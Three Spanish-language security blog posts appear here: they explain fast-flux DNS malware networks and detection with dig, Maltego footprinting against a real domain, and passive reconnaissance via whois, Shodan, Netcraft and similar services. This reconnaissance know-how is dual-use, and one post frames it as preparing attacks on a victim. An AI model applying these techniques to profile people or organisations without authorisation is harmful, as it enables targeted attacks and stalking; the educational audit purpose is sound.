Infraestructura FastFlux simple

Paso 1: Al igual que en el anterior ejemplo que hemos visto, le preguntamos al servidor DNS por la dirección de ejemplo.com

Paso 2: El servidor DNS le responde con la dirección IP 1.2.3.4 que en realidad no es la de ejemplo.com, es la de un servidor proxy que está haciendo de intermediario.

Paso 3: La víctima hace la petición HTTP a la dirección 1.2.3.4 que se trata de un ordenador infectado haciendo de proxy.

Paso 4: El ordenador zombie hace la petición al verdadero servidor ejemplo.com el cual la víctima en ningún momento sabe que este existe, está oculto para el, sólo es visible por el ordenador zombie.

Paso 5: El servidor real le devuelve al proxy  la petición que había realizado.

Paso 6: El proxy le devuelve a la víctima la respuesta que le ha dado el servidor real, en la comunicación que existe en el paso 3.

Cada poco tiempo el DNS devolverá una dirección diferente a la victima, todas esas direcciones IP que le devuelva serán de ordenadores infectados que actuarán exclusivamente como intermediarios entre el dominio ejemplo.com y la víctima.

Y os preguntareis, ¿Cómo detectar este tipo de red? podemos detectar que es una red fastflux con la herramienta dig la cual nos permite hacer consultas al servidor dns y así obtener la dirección IP del servidor al que se hace la consulta, en caso de darnos varias direcciones IP con un TTL (Tiempo de vida) bajo, posiblemente significará que nos encontramos frente a un servidor que esté utilizando una red fastflux y podemos comprobar haciendo varias peticiones durante 30-60 segundos como van cambiando las direcciones IP y de esta manera la estructura no siempre es igual, en ese caso es una clara infraestructura FastFlux por lo que con un simple baneo de IP no podríamos detener la distribución de malware. A continuación os dejo una imagen para que os podáis hacer una idea de como detectarlo.

Ejecución del comando dig

Una vez tenemos una idea de como actúan los cibercriminales, ya sabemos como evitar una posible infección. Añadir que estas personas, aprovechan noticias de gran repercusión para así poder conseguir infectar los equipos ya que, siempre que ocurre algo importante nosotros somos los primeros que buscamos información para saber que ha pasado exactamente. Mucho ojo ahora con la muerte del entrenador de FC Barcelona Tito Vilanova (En paz descanse) con los sitios que visitáis para buscar información porque seguro que muchos de los dominios se habrán creado hace horas para distribuir malware. Si queréis visitar un sitio porque creéis que tiene información pero la URL está acortada y no os fiais mucho, podéis visitar knowurl.com y escribirla para que os diga de donde viene exactamente e incluso hacer un virusscan, después podéis analizarla con los sitios que Edu nos enseño en su entrada de analizando objetivos sin hacer ruido.

knowurl.com analizando una url acortada

Un saludo!

@Joseliyo_Jstnk

Read More

Descubriendo la infraestructura con Maltego

Aprovechando que Edu escribió su entrada sobre la primera fase de una auditoría de seguridad - Analizando objetivos sin hacer ruido, voy a hablaros de una herramienta que sin duda no puede faltar a la hora de la recolección de información. Maltego es una herramienta que se encarga de recopilar información y mostrárnosla de forma gráfica para que esta sea más fácil de analizar. Entre otras características nos permite iniciar búsquedas a partir de correos, IPs, dominios, etc..

Por suerte, Kali incluye esta fantástica herramienta la cual ejecutaremos simplemente introduciendo el comando maltego en una terminal para que se inicie. Una vez iniciado tendremos que registrarnos para poder usarla. Después de registrarnos nos saldrá un asistente para seleccionar cual va a ser el dominio que vamos a escanear y el tipo de escaneo entre otras cosas que pueden ser los siguientes:

• Company Stalker: Intentará obtener todas las direcciones de correo y cuales dan resultado en las redes sociales. También obtendrá los documentos alojados en el dominio y extraerá los metadatos. Necesita un dominio de entrada para analizar.
• Footprint L1: Footprint de nivel 1, rápido y básico sobre el dominio.
• Footprint L2: Footprint de nivel 2, medio sobre el dominio.
• Footprint L3: Footprint de nivel 3, intensivo sobre el dominio. Este caso puede consumir muchos recursos y se necesita tiempo para llevarlo a cabo.

• Person - Email Addres: Intenta obtener los correos de una persona y averigua los sitios web en los que aparecen. Se necesita indicar un correo para iniciarlo.
• Prune Leaf Entities: Elimina las entidades sin nodos dependientes.
• Twitter Digger: Busca una frase como un alias de Twitter. Puede darse el caso de que la máquina se vea bloqueada por la API de twitter.
• Twitter Geo Location: Intenta encontrar la geolocalización de una persona en twitter

• Twitter Monitor: Monitoriza Twitter en busca de hashtags.
• URL to network add domain information: A partir de una URL obtiene información del dominio y la red.

En mi caso he seleccionado Footprint de nivel 2 y el dominio que le he indicado ha sido pp.es de lo que ha conseguido la siguiente información:

Como podemos ver en la esquina inferior derecha hemos obtenido registros MX, NS, redes entre otras cosas.. Al acercar el gráfico hasta algún punto podemos encontrarnos la información más ampliada.

Con esta herramienta tan sencilla y en un simple Footprint de nivel dos hemos conseguido información muy valiosa de un dominio, la cual podemos utilizar en el paso previo al ataque como es el de recolección de datos de nuestra víctima haciéndonos una idea de como está distribuido su dominio y a partir de ahí conseguir escanear por ejemplo hosts en busca de vulnerabilidades, aunque también podríamos obtener información de una persona en concreto y lanzar ataques dirigidos.

Un saludo :-)!

@Joseliyo_Jstnk

Read More

Analizando objetivos sin hacer ruido

Al igual que lo haría un ciberdelincuente, el primer objetivo antes de un ataque es la recopilación de información para conocer más a fondo nuestro objetivo. Se pueden utilizar diferentes técnicas, desde un simple escaneo de puertos a una dirección IP mediante NMap (búsqueda activa), hasta una simple búsqueda a través del servicio Whois para obtener información gracias a un tercero (búsqueda pasiva).

Tenemos que ser capaces de ponernos en la piel del atacante y actuar al igual que lo haría él, sin conocimiento alguno del objetivo (pruebas de caja negra). Lo más importante es no dejar rastro a la hora de llevar a cabo el descubrimiento de vulnerabilidades, para lo cual podríamos usar algún sistema de proxys como Proxy Chains o la la famosa red Tor, en próximas entradas nos centraremos en ello.

Nosotros nos vamos a centrar en la utilización de varias páginas y servicios de Internet que nos ofrecen gran cantidad de información de nuestros objetivos, lo que se conoce como búsqueda pasiva de información. Las páginas a usar son las siguientes y vamos a explicar que información podemos sacar de cada una:

WHOIS.NET - Obteniedo info de un dominio

Mediante el protocolo whois podemos descubrir mucha información de cualquier dominio simplemente buscamos una Web la cual nos de servicio de dicho protocolo y este accederá a una base de datos de los servidores whois para obtener información como el propietario del dominio, nombre del administrador, correo, etc.

Aquí podéis ver los resultados de la búsqueda y la cantidad de datos que obtenemos:

URLQUERY.NET - Analizando posible malware en un dominio

Urlquery es una Web que nos da servicio para analizar y detectar posible malware en un determinado dominio Web, además de obtener información de dicho dominio como su IP, su ASN (ISP), la ubicación, etc.

Podemos ver en la página principal como aparecen las últimas búsquedas y cuales han sido sus resultados en cuanto a Sistemas de Detección de Intrusos (IDS - Intrusion Detection Systems) y Listas Negras (BL - Black List)

Una vez que hacemos la búsqueda podemos comprobar si algunos de los script antimalware que se les han pasado a la Web han detectado algo, así como IDS que hacen saltar las alarmas, también si la Web ha estado en alguna lista negra, etc.

Aquí podéis ver parte de los resultados de la búsqueda:

SHODAN - Buscando dispositivos

Shodan es un buscador de dispositivos según el software que utiliza, la geografía, el sistema operativo, la dirección IP y más. Lo primero que debemos hacer es darnos de alta, que es gratuito, y así nos devolverá muchos más resultados de las búsquedas.

Para buscar un dispositivo en la casilla de búsqueda podemos poner un dominio, una ip, una palabra en concreto e incluso usar operadores como city, country, geo, hostname, etc. Vamos a hacer una búsqueda sencilla, dispositivos cisco de españa:

Podemos buscar por palabras concretas sobre un cierto software o servicio como Apache o ip camera, o una cierta marca de router Zyxel, o por un cierto modelo de decodificador de satélite dreambox. Si Shodan lo tiene en su base de datos, nos lo mostrará.

NETCRAFT.COM - Información de dominios

Netcraft proporciona servicios de seguridad de Internet, nos facilita informacion de dominios y subdominios, si un dominio ha estado en alguna lista negra, la configuración que usan, el histórico de versiones, el sistema operativo utilizado, etc.

Vamos a llevar a cabo una búsqueda de un dominio y veremos los resultados obtenidos.

Nos salen los dominios y subdominios asociados, junto con otra información.

Ahora pulsamos en Informe del Sitio del sitio principal y obtendremos bastante información como: dirección IP, ubicación, servidores DNS, si ha estado en alguna black list, versión del servidor Web, si tiene o no activado PHP, etc. Para poder ver esa información pulsar aquí.

ARCHIVE.ORG - Ver historiales de sitios Web

Internet Archive es un sitio Web donde podemos encontrar los historiales de los sitios Web más visitados. A continuación vemos los resultados de una búsqueda para uno de estos sitios.

Así si un sitio Web ha eliminado cierta información que no podemos encontrar ya, haciendo uso de archive.org nos podemos ir a la fecha que si estaba publicada y verla.


Existe también una herramienta muy útil dentro de Kali Linux que hace uso tanto de búsqueda pasiva como de búsqueda activa para obtener información de dominios, se llama theHarvester, os dejo un enlace donde encontrar información: https://code.google.com/p/theharvester/

Además de todas estas Web de búsqueda pasiva haciendo uso de terceros, existen muchas otras, de tal forma que no tengamos que hacer ningún ruido para nuestra primera fase de una auditoria de seguridad, que no es sino la búsqueda de información.

Espero que os sea de utilidad !!

@eduSatoe

"Nunca releo mis libros, porque me da miedo." 

Gabriel García Márquez

Read More